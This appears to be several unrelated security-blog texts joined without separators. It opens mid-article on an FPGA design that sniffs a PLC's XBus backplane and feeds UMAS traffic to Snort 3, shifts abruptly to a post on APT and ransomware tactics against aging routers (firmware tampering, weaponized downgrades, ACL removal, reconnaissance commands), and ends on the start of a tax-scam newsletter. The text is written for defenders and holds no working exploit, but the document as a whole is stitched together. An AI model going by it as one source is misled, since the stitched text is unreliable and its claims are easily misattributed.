The RX_DATA pin is used by all modules to read data from the active module. This is an active low signal which is unique due to the RX_CLK and CONTROL pins all being active high. The data is read at the rising edge of the RX_CLK. This data seemingly has roughly five clock cycles before data is seen for a valid message which explains the starting value of messages always being 0x04 or 0x05 (five 0 bits)
Programmatically sniffing XBus traffic
Inspecting the XBus with a logic analyzer, while functional, is not a feasible solution for ongoing analysis. To this end, we needed a programmatic solution to do this work for us and present the information in an easy-to-digest format.
Hardware constraints
At this point, there is a pretty restrictive set of constraints in place for a solution:
Must be as close to "real-time" as possible.
This means no "slow protocols" such as UART (1-3 MHz in most commercial chips).
We have to measure at least 12 MHz. If we take a conservative speed to properly sample, we have to run at a speed of at least 48 MHz.
Must be on the backplane, ideally not between devices and the backplane.
We can't rely on the backplane clock due to it turning off regularly.
We have to get the data into something Snort can detect.
After considering our options, we decided to approach the problem with a hardware solution and chose Artix-7 FPGAs as a reasonable platform to develop on.
Hardware Approach 1: Failure
The initial solution was to ignore UART limitations (which were unknown at the time) and build a hardware solution that shipped data over UART directly from the backplane, one byte at a time. While the extraction of data from the backplane was successful, UART was a massive bottleneck and killed any semblance of real-time data detection into Snort.
Hardware Approach 2: Our Solution
Overview
The hardware design is as follows:
This is a Microblaze processor which is included in Vivado. It is clocked at 83.333 MHz (higher than our required 48 MHz). Our physical inputs are on the left side of the image. sys_clock and reset are provided by the board itself. ext_clock, ext_data and backplane_rst are all inputs. ext_clock is connected to RX_CLK from the backplane, ext_data is connected to RX_DATA, and backplane_rst is connected to a dip switch on the Arty-A7 to purge all of the buffers during operation (this is mostly just for testing and troubleshooting).
This Microblaze processor includes UART, and Ethernet, as well as a simple timer peripheral. This allows us to use the 10/100 Ethernet module as our communication output.
The most important part of this design is to note the BackplaneReader_AXIL and the connection of the dataReady_interrupt back to the Concat block entering the interrupt controller. This interrupt signals the Microblaze processor when data is ready to be read from the backplane and be sent out over the network to the listening process for further processing.
The general flow of data is as follows:
Bits recorded at the rising edge of RX_CLK, bits are shifted into a single byte.
Once a byte is captured, a flag is set to signal that the byte is ready for transfer.
When the flag is set, the byte is shifted into a 4-byte buffer, and a counter is incremented.
Every time the counter modulo 4 equals 0, the 4-byte buffer is written to the AXIL register of the correct index, and the buffer accepts new bytes.
This loops until the RX_CLK goes inactive (high) for more than 80 clock cycles (83.333 MHz clock cycles) we trigger the interrupt to the CPU which then sends the data to the network using zero-copy for performance.
Module descriptions
These modules are the building blocks of Verilog. One can look at them as something like functions in normal programming languages. These building blocks will be covered from the smallest (most basic) to the largest (most complex). They will include whether they are building on previous modules or not.
clock_reset
This is a very simple module that runs at the high-speed hardware clock (83.333 MHz for our example) to sample the slower backplane clock (12 MHz). It takes a parameter of a comparison value and this is used to check how many fast clock cycles the backplane clock has been high. This module is instantiated in two forms, a fast form and a slow form. The slow form (80 counts) is to determine when a message is completely done and the backplane clock goes inactive for a "long" time. The fast form (five counts) is used to group fragmented messages. This is purely for performance that was required to get all the messages out of the processor before the next interrupt occurred.
Previous to this grouping of messages (which always seem to be related in our testing, specifically we see this in UMAS messages that get fragmented across multiple XBus messages), the Microblaze processor was operating too slowly to get messages out via UDP before another interrupt occurred, this caused issues with memory leaks (before zero-copy implementation), but also causes us to lose packets, because the UDP messages are all so small (roughly 48 bytes of data) we decided to start combining packets to reduce the overhead of moving the packets to the NIC and sending them. This is a possible performance bottleneck that could be improved.
sample_output
This module builds on the clock_reset modules. Specifically, this module is responsible for sampling bits from the ext_data input, which is RX_DATA from the backplane. It does this sample by shifting inverted bits (because this signal is active low) into a one-byte buffer and incrementing a counter. Once that counter hits eight, we have a full byte and we set a flag showing that the byte is ready to be sampled. We have to do this buffering because we are crossing a clock domain at this point, from the backplane (12 MHz) to the FPGA/CPU's clock (83.333 MHz).
This module is also responsible for tracking the output of the fast and slow clock_reset modules. When these clock deactivations are set, two different things happen. When the fast clock_reset is set, the byte buffer counter is reset, which means we are starting a new byte. The issue this resolves is when you have multiple messages before a slow clock_reset and you have bits that don't belong to a real byte. The RX_CLK is active beyond the end of the last bit of real data, for roughly five clock cycles (it changes) which causes garbage data to be collected. This fast reset will clear our bit counter and we will overwrite the garbage data with valid data for the next message. The slow clock_reset is when a backplane module is done talking. This rests the counter, deactivates all logic (so we aren't recording garbage data), purges the one-byte buffer and resets the clock rising-edge detector. Once the slow clock_reset signal is unset, it resumes normal operation of detecting bits on the rising edge, and recording them.
Between this module and clock_reset this performs the physical, bit-by-bit processing of the backplane data. and is somewhat simple and easy to understand, all the modules above this are used for buffer, clock domain changes, processor interfacing, and ease-of-use.
BackplaneReader_AXILite_v1_0_S00_AXI
This module is the main interface for the processor backplane sampling. It contains all of the glue logic for the AXI-Lite protocol (courtesy of Xilinx/Vivado). The glue code has been modified to completely disable write functionality to any of the memory-mapped registers (read-only memory space in the processor). This wasn't entirely necessary for optimization, but there is no reason to be able to write to these registers.
This module builds on sample_output and when a single byte has been collected from the backplane it collects that byte and shifts it into a 4-byte buffer and increments a counter. Once that counter, modulo 4 is zero, stores the data in the 4-byte buffer into the register associated with the current offset counter, then the offset counter is incremented. This is used to populate the memory-mapped registers with data from the backplane in real time. The offset counter is reset at the end of every message and it writes to the same buffers every XBus message (starting from offset 0) each register contains four bytes of data from the backplane, except the last register (register 64) which contains the number of registers currently populated (which means to get the length of data, we multiply by four). This module is responsible for populating all of the memory-mapped information to the processor itself so we can use this peripheral from software later.
This module is also responsible for flickering the dataReady_interrupt to the processor so it can begin processing the XBus message. It has to keep track of the length of this flicker and that the flicker (1 clock cycle only) has already occurred for a specific message. This is a solution to a processor configuration (interrupt on level instead of rising edge) you can change this processor configuration which would fix the issue as well, but this is the safest option to reduce error. If you don't have this fix in place, the processor will get caught in an interrupt loop and not send any data at all since it is constantly interrupting itself.
BackplaneReader_AXILite_v1_0
This module is simply a wrapper for all the internal modules and directly wraps BackplaneReader_AXILite_v1_0_S00_AXI, it passes signals directly through and serves no other purpose.
Microblaze System
Once we have developed our IP (that is how it is packaged in Vivado), we can begin to integrate it into a Microblaze processor system. This integration occurs with the AXILite protocol. What this gives us is a peripheral that is directly memory-mapped into the processor's memory space and can be accessed by directly reading memory. This interface gives us the same ease of use as you would expect with a RAM module or an ethernet module in any processor or SOC you normally work with.
Microblaze Configuration
The normal configuration for Microblaze processors was used, the most basic of walkthroughs can be found here. This means we need our clock wizard, which generates 166 MHz, 200 MHz, (both of these are for the memory controller), and 25 MHz (Ethernet reference clock). We also need a memory controller that is responsible for interfacing with the Arty-A7's onboard RAM. Then we add the Microblaze processor which automatically includes the interrupt controller, the processor system reset, the debug module (if requested), local memory for the processor, and an AXI controller (for all of our peripherals). We then need to add the ethernet module, the UART module, an AXI timer, and our backplane reader peripheral.
Once we have added all of our peripherals there are two extremely important steps. We need to connect our BackplaneReader_AXIL peripheral and connect the dataReady_interrupt to our processor interrupt controller. This is done through a Concat block which is how we can add interrupts together for this processor. It is also very important to check the memory map of the processor that was added, as well as the configured Data-cache and Instruction-cache addresses. If you do not check these values, they will cause you endless headaches as you try to boot your processor and nothing works, and no errors are given. When adding a custom peripheral it seems to add it to both the DCache and ICache areas, which makes all instructions un-fetchable, and you don't want this region cached anyway since the data would need to be invalidated constantly (which is slow).
This shows the Data-Cache settings we are using:
This shows the Instruction-Cache settings we are using:
These settings are nothing special for a processor and make perfect sense if you are looking at a memory map, but Vivado gives you no obvious warning that your memory map may be the source of your issues when you can't fetch instructions because your instruction cache is in the wrong location.
Hardware wrap-up
At this point, we can synthesize our specific hardware and move on to the glorious abstraction that is C. There are some things to note here for future implementations and work. This decision to use a Microblaze processor has a lot of baggage with it. The Microblaze processor has some timing requirements that are not so easy to just "increase" and we add a significant overhead to performance versus just implementing a hardware-only (no processor) interface between the backplane reader and the ethernet module, but this is also a lot of Verilog to do this (correctly) and was causing a lot of issues. By adopting the abstraction of the processor, the Microblaze system takes care of all of the requirements for handshakes, packet buffers, receiving, sending, and everything else, but we pay in performance. This is something that may be removed in the future if this moves on to become a real product with the ability to significantly reduce cost by not needing a processor. Either a single FPGA chip or an ASIC could be produced to perform the lifting of XBus to UDP. Alternatively, by adding a higher-speed processor, we could move the processing done externally for the proof of concept, to the onboard processor (say, if we had more threads), to reduce the overall footprint. It is important to keep in mind that most of the design decisions chosen here were for a working proof of concept, and may not be ideal moving forward to a real product.
Software Solution
Programming our new Processor
As we move into the land of C we need to keep in mind that we are programming a bare-metal processor (essentially working with a microcontroller).
The simplicity of main
We have the luxury of working with LWIP (IP stack) to do the heavy lifting with the networking, but not much else is provided, and we are the only task running. As such, we need to do some pretty generic setup.
ip_addr_t ipaddr, netmask, gw;
/* the mac address of the board. this should be unique per board */
unsigned char mac_ethernet_address[] =
{ 0xde, 0xad, 0xbe, 0xef, 0x13, 0x37 };
send_netif = &server_netif;
init_platform();
/* initialize IP addresses to be used */
IP4_ADDR(&ipaddr, 192, 168, 1, 10);
IP4_ADDR(&netmask, 255, 255, 255, 0);
IP4_ADDR(&gw, 192, 168, 1, 1);
lwip_init();
/* Add network interface to the netif_list, and set it as default */
if (!xemac_add(send_netif, &ipaddr, &netmask,
&gw, mac_ethernet_address,
PLATFORM_EMAC_BASEADDR)) {
xil_printf("Error adding N/W interface\n\r");
return -1; }
netif_set_default(send_netif);
/* specify that the network if is up */
netif_set_up(send_netif);
/* Set up our global PCB for UDP */
upcb = udp_new();
err_t err;
ip_addr_t remote_addr;
err = inet_aton("192.168.1.255", &remote_addr);
...
err = udp_bind(upcb, &ipaddr, 0);
...
err = udp_connect(upcb, &remote_addr, 13370);
...
Error handling has been trimmed for brevity, but this initialization simply sets up the LWIP stack, defines our MAC and IP addresses, and configures our interface for sending. It also configures where we are sending, which in this case is broadcast over the 192.168.1.X network. This was chosen for the simplicity of configuration during testing and could be changed to a unicast address later.
Once we do our initialization we move on to the import part of the main.
// EXPERIMENTAL: This size could possibly not be enough?
packet = pbuf_alloc(PBUF_TRANSPORT, 0x400, PBUF_RAM);
/* now enable interrupts */
platform_enable_interrupts();
/* receive and process packets */
while (1) {
}
This code is what allows our processor to hang forever processing interrupts, and what also gives us the ability to have zero-copy (at least before LWIP) sending of UDP packets giving us the performance to keep up with the backplane speed. We allocate a single packet buffer of a set size and reuse this buffer every single time we get a packet. This buffer is populated during an interrupt and sent at the same time. Once we enable the interrupts we leave the processor to wait and act on each interrupt and loop forever.
ma..Interrupted
The real magic in this XBus processing is using interrupts to preempt the Microblaze processor when an XBus message is ready to be sent. This is the only way we can guarantee that messages won't be overwritten by the time the processor gets around to sending a message, that we aren't sending duplicates of the same message, and we are trying to send a message while data is being written to the buffer.
During our platform_init() we are setting up interrupts for the processor during operation with a call to platform_setup_interrupts(). This function is responsible for initializing and starting the interrupt controller for the Microblaze processor, and we insert our platform_setup_backplane(intcp) into this initialization.
Within platform_setup_backplane(intcp) all we need to do is register our custom interrupt handler for the interrupt associated with our BackplaneReader_AXIL peripheral. The handler itself is quite simple:
void BackplaneInterruptHandler(void *CallbackRef) {
// We need to get the size of the buffer so that we can set the pbuf size accurately, this reduces work
// on the recv end.
u32 size = BACKPLANEREADER_AXILITE_mReadReg(0x44a00000, 63*4) + 1;
if (size == 0) {
return;
}
// We don't want to copy anything, just grab the memory directly where it is, this significantly reduces
// time to send the packets.
packet->payload = (void *) 0x44a00000;
packet->tot_len = size * sizeof(int);
packet->len = size * sizeof(int);
err_t err = udp_send(upcb, packet);
if (err != ERR_OK) {
xil_printf("send error", err);
return; }
}
This handler needs to be designed to operate as quickly as possible since the Microblaze processor will preempt itself during an interrupt. This can lead to issues such as memory leaks, and lost data. Originally, this design included pbuf allocation and freeing, but was too slow to complete before the next interrupt came in. This caused a memory leak where the processor would no longer be responsive to new XBus messages that came in.
In this design, no memcpy or allocations are required. We reuse the global pbuf that is allocated in the main and just change the payload pointer as well as the tot_len and len fields. We can get these values by reading the last register within the memory-mapped region of our peripheral, due to our special register that holds the number of memory-mapped registers that are populated for any given message. This allows us the ability to not worry about zeroing registers and also gives us the ability to ignore extra data since we know the exact length.
Once we have the length, we can just populate the proper fields within the UDP pbuf and send the packet, LWIP handles everything else. This allows us to avoid copying the data as well as making execution extremely fast so we don't preempt our code (at least any noticeable amount).
Software wrap-up
There are a few bugs with this approach currently. The largest of which is the truncation of data from the backplane. This only occurs when the message modulo 4 is not equal to zero. This was deemed out of scope for the proof of concept due to a huge portion of the messages being aligned on four-byte boundaries. Additionally, the eight-byte footer of all XBus messages is assumed to be a checksum of some sort, and as such, we will never truncate "important" data for processing currently. This would require an addition to the hardware implementation that would move the data to the proper offset of memory-mapped registers after zeroing out un-unrelated data within the register when you have anywhere from one to three bytes at the end of a message.
XBus backplane traffic analysis
Data bus exploration
The first solution to extract data was far from perfect. Using the Saleae, we captured the data on each of the important data pins. Once we captured the data, we exported this to a CSV. This CSV contained the transitions of each line and the time it transitioned. Using this information we could extract the number of bits at each transition and turn it into ASCII data (1 and 0) which we then converted to binary data. This gave us early access into what the data looked like and allowed us an easy way to search for bit patterns and troubleshoot some issues with our capturing of data during the process of finding a real solution. While this works well, it is not a reasonable approach for real-time monitoring or alerting, but it provided us an excellent way to check our work for complex solutions.
More sustainable sniffing
With XBus messages getting pulled off of the backplane and sent across the wire from an FPGA it is now necessary to take that traffic and find a way to get it into Snort. For this PoC (and time), we are extracting UMAS messages contained within XBus, however, future XBus analysis is possible, as all extraction happens post-FPGA. Once UMAS messages have been extracted, a TCP connection containing the traffic is spoofed on Snort's inspection interface, allowing us to leverage all of the detection and alerting capabilities of Snort 3.
Receiving traffic from the FPGA
As the FPGA reads XBus messages off of the backplane it sends that traffic via UDP out over broadcast. These messages will then need to be parsed before we can do anything with them.
Handling high speeds
The FPGA is sending traffic at approximately 1,143 UDP datagrams per second. Unfortunately, this ends up being a bit too fast for Python to handle in a normal recv loop. To solve this we have used the multiprocessing plugin to spin up multiple recv loops and put the results into a shared queue. This seems to help up to about 10 workers, after which an efficiency increase is not noticeable.
Unfortunately, this does not completely fix the problem at high speeds, but it catches enough for a PoC. The remaining problems exist but could be solved with either a more complete hardware solution or a compiled message processor.
Parsing FPGA messages
Traffic coming from the FPGA can arrive in one of two states:
One XBus message.
A grouping of multiple related XBus messages.
Regardless of the state in which the UDP message arrives, the endianness of the message will need to be swapped. Due to restrictions in place from Microblaze, the message will be sent in four-byte little-endian blocks. To properly interpret the message these must be flipped, as shown below:
After this point, any reference to the UDP message will refer to the version that has had its endianness fixed. Patterns are not as easy to see in the raw format.
When UDP traffic from the FPGA arrives containing one single XBus message there is not any additional processing that must be done before moving on to UMAS extraction. In cases where a grouping of XBus messages is contained, they must be split apart before UMAS messages can be extracted from them.
Since we are only demonstrating UMAS via XBus traffic at this time, true analysis on how to split apart arbitrary XBus messages has not been performed. We have instead focused on how to split apart specifically the messages containing UMAS data.
Through analysis, it was determined that the flag b'\x08\x64\x01\x00\x00\x7f appears in the first (and only the first) XBus message of every UMAS message. Fortunately, this flag also does not appear to ever show up in any XBus messages that are not related to UMAS. Using this it is possible to continue processing only the messages containing this flag and discard the rest. Note that since related XBus messages will always come sent as a single UDP message this will not result in loss of the end half of the UMAS message.
An example of a message from the FPGA containing one XBus message that holds one UMAS message will have a payload similar to the following:
We can extract the UMAS message by parsing this message type:
Field
Size (bytes)
Value
Description
Message Type
0x01
05
A byte appears to indicate the type of message. We do not know much about this byte, however, it is always 0x04 or 0x05.
Unknown
0x09
75 84 26 04 27 05 F9 36 08
Unknown Bytes
XBus Payload Length
0x01
15
A one-byte field indicating the number of bytes in the XBus payload minus the one for this field
In the first XBus part of a UMAS message, this value will contain non-UMAS data whereas in subsequent XBus parts of that same message, the payload will be entirely UMAS data.
Unknown
0x01
00
Unknown byte
SRC
0x01
0A
A byte indicating the source module. We will use this later to create an IP and MAC.
DST
0x01
0C
A byte indicating the destination module. We will use this later to create an IP and MAC.
Unknown
0x06
59 06 1B 00 00 00
Unknown bytes.
UMAS Flag
0x06
08 64 01 00 00 7F
Six bytes that always appear at the first XBus part of a UMAS message and do not appear at any other time.
Unknown
0x03
D9 D9 06
Unknown bytes.
UMAS Message
Variable
5A 00 03
The UMAS message, or the first part of the UMAS message when split across multiple XBus messages.
This size is determined by the 'XBus Payload Length' field.
In this case, we have an 'XBus Payload Length' field of 0x15. That value is made up of the size of this field, plus every preceding field until (but not including) the 'XBus Payload Length' field.
If the UMAS message is split across multiple XBus messages the remaining data will be found in the entire XBus payload of those messages.
Unknown
Variable
03 11 A2 00
Unknown bytes that presumably serve as a footer. Maybe checksums or similar. This size ends up being variable due to some assumptions on the FPGA side and cannot be trusted.
An example of a message from the FPGA containing multiple XBus messages that collectively one UMAS message will have a payload similar to the following:
In this case, XBus Message 1 will be parsed the same way as the single message. XBus Message 2 will use the entirety of the XBus Payload section to contain UMAS message data. XBus Message 3 will follow the same header as the previous two, however, it will only contain as many bytes as are remaining according to the XBus Payload Length field, followed by an untrusted-length footer.
Once in this state, the messages can be passed along for UMAS extraction.
Extracting UMAS from XBus
Once a grouping of XBus messages containing a single UMAS message has been isolated it is possible to extract the complete UMAS message. If there is only one XBus message, the UMAS message can be extracted from the UMAS Message field documented above. This becomes more complicated when dealing with multiple XBus messages.
Using the grouped example from above, we start with the following XBus messages.
These messages can then be broken apart into their known fields. Keep in mind that some of the documented fields do not show up in messages other than the first.
After visualizing the layout, it becomes easier to calculate the location of the desired UMAS message part using the following assumptions:
The first XBus message will always contain the UMAS flag.
The length field will always be at offset 0x0A in the first XBus message.
The value in the length field will always contain the total size of the UMAS message, plus 0x12 bytes for non-umas XBus payload information in the first packet.
The maximum size of any given UMAS-related XBus packet is 0x30 bytes with 0x20 reserved for the XBus payload.
The footer field on the last XBus message cannot be trusted.
When properly extracted, we will be left with a UMAS message similar to the following:
With a properly formatted UMAS message now in hand, a method of getting that traffic into Snort is needed. Our quick solution to this was to create a TCP stream containing this traffic across an interface on which Snort was listening. Since we don't need to send the message anywhere, we only need to make Snort think we did, we can use Scapy to craft the entire conversation.
Unfortunately, we do not have actual addresses for the source or destination, only single-byte identifiers. Since we would like to retain this information, we use that value as the last byte of a MAC address for the device (DE:AD:BE:EF:00:XX) and the last octet of an IP address (192.168.0.XXX).
By sending this traffic out over loopback while having Snort listen on the same interface it is possible to get Snort to process the traffic.
It should be noted that there are much better ways of getting Snort 3 to ingest this data, which should be used in a true implementation, however, the development of that functionality was out of the scope of this project.
Traffic detection in Snort 3
Since this connection results in standard Ethernet traffic, nothing special is required to get that information into Snort3, simply attach a snort sensor to the relevant interface, as discussed in the Snort3 documentation.
Caveat
The approach taken here to get Snort to ingest XBus traffic was chosen due to time constraints with the project. Much more efficient ways exist to get this type of traffic into Snort and properly decoded, however, the time involved in doing so was deemed out-of-scope.
Proof of Concept
Impact
The inability of security teams to properly monitor all traffic crossing the backplane is a problem in today’s OT networks. Proprietary protocols that were once obscured from view are now being brought to light and decoded with modern tooling. Since these protocols are often capable of making critical changes to the devices that they speak to, more focus is being put on them by malicious actors and legitimate operators alike. Without the ability to see everything going on on the backplane networks, operators are leaving their monitoring tools like Snort3 blind to potential attacks.
Security vendors can’t solve this problem on their own. While groups like Cisco are capable of building the hardware to perform this type of monitoring, the impact to customer warranties introduced by plugging in a third-party module cannot be ignored. For monitoring of this type to truly become an option, consumer demand must drive the conversation. PLC vendors have both the capability and the product expertise to create products that accomplish what Badgerboard set out to do; they just need to be pushed by their customers.
We’ve been discussing networking devices quite a lot recently and how Advanced Persistent Threat actors (APTs) are using highly sophisticated tactics to target aging infrastructure for espionage purposes. Some of these attacks are also likely prepositioning the APTs for future disruptive or destructive attacks.
Talos has also observed several ransomware groups gaining initial access to networking devices to extort their victims. We wrote about these attacks in our 2023 Year in Review report.
The mechanisms and methodology behind these two groups are drastically different, but no less concerning. This is partly because networking devices offer a great deal of access to an attacker. If you can compromise a router, you are highly likely to have a point of ingress into that network.
These attacks are largely being carried out on aging network infrastructure; devices that have long since gone end-of-life, and/or have critical unpatched vulnerabilities sitting on them. Many of these older devices weren’t designed with security in mind. Traditionally, network infrastructure has sat outside of security’s ecosystem, and this makes monitoring network access attempts increasingly difficult.
Adversaries, particularly APTs, are capitalizing on this scenario to conduct hidden post-compromise activities once they have gained initial access to the network. The goal here is to give themselves a greater foothold, conceal their activities, and hunt for data and intelligence that can assist them with their espionage and/or disruptive goals.
Think of it like a burglar breaking into a house via the water pipes. They’re not using “traditional” methods such as breaking down doors or windows (the noisy smash-and-grab approach) — they’re using an unusual route, because no one ever thinks their house will be broken into via the water pipes. Their goal is to remain stealthy on the inside while they take their time to find the most valuable artefacts (credit to my colleague Martin Lee for that analogy).
In this blog, we explore how we got here, and the different approaches of APTs vs ransomware actors. We also discuss three of the most common post-compromise tactics that Talos has observed in our threat telemetry and Cisco Talos Incident Response (Talos IR) engagements. These include modifying the device’s firmware, uploading customized/weaponized firmware, and bypassing security measures.
How we got here
There is a rich history of threat actors targeting network infrastructure — the most notorious example being VPNFilter in 2018. The attack was staged, but potential disaster was averted when the attacker’s command and control (C2) infrastructure was seized by the FBI, preventing the attacker from issuing the final command to take over the devices.
At the time, we spoke about how VPNFilter was the “wakeup call that alerted the cybersecurity community to a new kind of state-sponsored threat — a vast network of compromised devices across the globe that could stow away secrets, hide the origins of attacks and shut down networks.”
The techniques used in VPNFilter gives us plenty of clues as to possible current threat actor motivations. In the attack, the modular design of the malware allowed for many things to take place post compromise – one module even allowed the malware to create a giant Tor network of the 500,000 compromised devices.
A recent attack which may have been inspired by this was the KV Botnet (Lumen released a blog about this in December 2023). The botnet was used to compromise devices including small and home office (SOHO) routers and firewalls and then chain them together, “to form a covert data transfer network supporting various Chinese state-sponsored actors including Volt Typhoon.”
The Beers with Talos team recently spoke about the KV Botnet and Volt Typhoon, a group widely reported by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), Microsoft and other organizations to be a PRC-based state actor. They have been known to conduct long-term espionage activities and strategic operations that are potentially positioning them for future destructive/disruptive attacks. Listen to the episode below:
In 2019, we saw another type of modular malware that was designed to target network infrastructure: “Cyclops Blink.” This was dubbed the “Son of VPNFilter” because of the similarities to that campaign.
The Cyclops Blink malware was designed to run on Linux systems, specifically for 32-bit PowerPC architecture. It could be used in a variety of ways, including reconnaissance and espionage activity. It leveraged modules to facilitate various activities such as establishment of C2, file upload/download and data extraction capabilities.
In 2022, Talos wrote about how we had detected compromised MikroTik routers inside of Ukraine being leveraged to conduct brute force attacks on devices protected by multi-factor authentication. This continued the pattern we have seen since our investigation into VPNFilter involving actors using MikroTik routers.
APTs and cyber criminals have different goals for attacking network infrastructure. APTs want to go in with stealth and hide for espionage purposes. Criminal groups use edge devices to an end for ransomware purposes.
For more insights into the status of attacks on network infrastructure, here is Talos’ Matt Olney and Nick Biasini talking about what Talos has observed over the past 18 months:
Post compromise tactics and techniques
Compromising the network for persistent access and intelligence capture is a multi-step process and requires a lot of work and expertise in targeted technologies which is why we typically only see the most sophisticated threat actors carry out these attacks.
Below are some techniques that Talos has observed post compromise on out-of-date networking equipment, in order to maintain persistent access. We initially discussed these in our threat advisory in April, as well as our 2023 Year in Review, but due to the sophisticated nature of these attacks and the continued exploitation, we wanted to dive deeper into some of these tactics:
1) Modifying the firmware
Talos has observed APTs modifying network device firmware on older devices to add certain pieces of functionality, which will allow them to gain a greater foothold on the network. This could be adding implants or modifying the way the device captures information.
An example of this is the recent exploitation of Cisco IOS XE Software Web Management User Interface. One attack included the deployment of an implant we called “BadCandy” which consisted of a configuration file (“cisco_service.conf”). The configuration file defined the new web server endpoint (URI path) used to interact with the implant. That endpoint receives certain parameters that allowed the actor to execute arbitrary commands at the system or IOS level.
Another example is from September 2023, when CISA wrote about how BlackTech was observed modifying firmware to allow the installation of a modified bootloader which helps it to bypass certain security features (while creating a backdoor to the device).
Detecting the modification of firmware is extremely difficult for defenders. Occasionally, there may be something in the logs to imply an upgrade and reboot, but turning off logging is usually one of the first steps attackers take once they are inside a network.
This again highlights the need for organizations to sunset aging network infrastructure that isn’t secure by design, or, at the very least, increasing cybersecurity due diligence on older equipment such as configuration management. Performing configuration comparisons on firmware may help to highlight when it has been altered by an adversary.
2) Uploading customized/weaponized firmware
If threat actors cannot modify the existing firmware, or they need additional levels of access that they don’t currently have, adversaries can upload customized or old firmware they know have working exploits against it (in effect, reverting to an older version of the firmware).
Once the weaponized firmware has been uploaded, they reboot the device, and then exploit the vulnerability that is now unpatched. This now provides the threat actor with a box that can be modified with additional functionality, to exfiltrate data, for example.
Again, as with the modification of firmware tactic, it’s important to check your network environment for unauthorized changes. These types of devices need to be watched very closely, as threat actors will want to try and prevent system administrators from seeing the activity by turning off logging. If you’re looking at your logs and it looks like someone has actually turned off logging, that is a huge red flag that your network has been infiltrated and potentially compromised.
3) Bypassing or removing security measures
Talos has also seen threat actors take measures to remove anything blocking their access to fulfil their goals. If for example they want to exfiltrate data, but there’s an access control list (ACL) that blocks the actor from being able to access the host, they may modify the ACL or remove it from the interface. Or they may install operating software that knows to not apply ACLs against certain actor IP addresses, regardless of the configuration.
Other security measures that APTs will attempt to subvert include disabling remote logging, adding user accounts with escalated privileges, and reconfiguring SNMP community strings. SNMP is often overlooked, so we recommend having good, complex community strings and upgrading to SNMPv3 where possible. Ensure that your management of SNMP is only permitted to be done from the inside and not from the outside.
The BadCandy campaign is a good example of how an actor can remove certain security measures. The adversary was able to create miniature servers (virtualized computers) inside of compromised systems which created a base of operations for them. This allowed the threat actors to intercept and redirect traffic, as well as add and disable user accounts. This meant that even if the organization were to reboot the device and erase the active memory, the adversary would still have persistent accounts – effectively a consistent back door.
Additional campaign objectives
In our original threat advisory, we also posted a non-exhaustive list of the type of activities Talos has observed threat actors take on network infrastructure devices. The point behind this is that threat actors are taking the type of steps that someone who wants to understand (and control) your environment.
Examples we have observed include threat actors performing a “show config,” “show interface,” “show route,” “show arp table” and a “show CDP neighbor.” All these actions give the attackers a picture of a router’s perspective of the network, and an understanding of what foothold they have. Other campaign objectives include:
Creation of hub-and-spoke VPNs designed to allow the siphoning of targeted traffic from network segments of interest through the VPN.
The capture of network traffic for future retrieval, frequently limited to specific IPs or protocols.
The use of infrastructure devices to deliver attacks or maintain C2 in various campaigns.
The first thing to say when it comes to recommendations is that if you are using network infrastructure that is end of life, out of support, and now has vulnerabilities that cannot be patched, now really is the time to replace those devices.
To combat the threat of aging network infrastructure as a target, Cisco became a founding member of the Network Resilience Coalition. Along with other vendors in this space and key governmental partners, the group is focussed on threat research and recommendations for defenders. The initial report from the Network Resilience Coalition was published at the end of January 2024 and contains a broad set of recommendations for both consumers of networking devices and product vendors.
Earlier this month, Cisco’s Head of Trust Office Matt Fussa wrote about how organizations should view these recommendations, and the overall threat that end-of-life network infrastructure poses on a national security level.
The report from the Network Resilience Coalition contains an in depth set of recommendations for network infrastructure defense. Here is a brief summary:
Key recommendations from the report for network product vendors include:
Align software development practices with the NIST Secure Software Development Framework (SSDF).
Provide clear and concise details on product “end-of-life,” including specific date ranges and details on what support levels to expect for each.
Separate critical security fixes for customers and not bundle those patches with new product features or functionality changes.
Get involved in the OpenEoX effort in OASIS, a cross-industry effort to standardize how end-of-life information is communicated and provide it in a machine-readable format.
Purchasers of network products should:
Favor vendors that are aligned with the SSDF, provide you with clear end-of-life information, and provide you with separate critical security fixes.
Increase cybersecurity diligence (vulnerability scanning, configuration management) on older products that are outside of their support period.
Periodically ensure that product configuration is aligned with vendor recommendations, with increasing frequency as products age, and ensure implementation of timely updates and patches.
As the report says, “These recommendations, if broadly implemented, would lead to a more secure and resilient global network infrastructure and help better protect the critical infrastructure that people rely on for their livelihood and well-being.”
From a Talos perspective, we are keen to re-emphasize this point and help our customers transition from equipment that has become end-of-life. Using networking equipment that has been built with secure-by-design principles such as running secure boot, alongside having a robust configuration and patch management approach, is key to combatting these types of threats. Ensure that these devices are being watched very carefully for any configuration changes and patch them promptly whenever new vulnerabilities are discovered.
Proactive threat hunting is also one of the ways that organizations can root out visibility gaps and hints of incursion. Look for things like VPN tunnels, or persistent connections that you don't recognise. This is the type of thing that will be left in an attack of this nature.
And finally, the definition of post compromise means that the attacker had gained some form of credentials to get them to the place where they could then launch the exploit and get deeper access to the device.
Our recommendations are to select complex passwords and community strings, use SNMPv3 or subsequent versions, utilize MFA where possible, and require encryption when configuring and monitoring devices. Finally, we recommend locking down and aggressively monitoring credential systems like TACACS+ and any jump hosts.
It’s that time of the year when not only do you have to be worried about filing your federal taxes in the U.S., you must also be on the lookout for a whole manner of tax-related scams.
These are something that pop up every year through email, texts, phone calls and even physical mail — phony promises to get your tax return back faster, file your taxes “easy and free” or maximizing your possible return. Usually, the bad actors behind these are either looking to steal your money or personal information.
And it turns out this isn’t just a problem in the U.S., either. We published new research last week into a trojan malware that’s been infecting victims in Mexico with tax-related spam emails and other social engineering tactics.
Many countries across the world all have tax filing deadlines around the same time — Japan’s is just around the corner on March 15, in the U.S. it’s April 15, and several countries (Brazil, Canada, Chile, etc.) all share an April 30 filing deadline. So, adversaries all over the globe are going to be leveraging tax-related topics in their spam emails and social engineering campaigns in the coming weeks, trying to steal money, infect devices with malware, or steal critical personal information.
It’s important to remember that this isn’t “peak spam season” or anything, though, and it’s not the time to spread FUD that, “Oh, your inboxes are going to be flooded with spam!”
As I’ve written and talked about before, there isn’t more spam during tax season, it’s just different. Think about the confirmation bias that pops up when you buy a new car, and then suddenly you start seeing that car everywhere else on the road when you didn’t notice it as much before.
Talos’ telemetry indicates that spam hasn’t increased during tax filing season in the U.S. for many years, and attackers’ tactics largely stay the same: Try to create a convincing offer, document, or link, and try to convince the target to engage with that social engineering in some form.
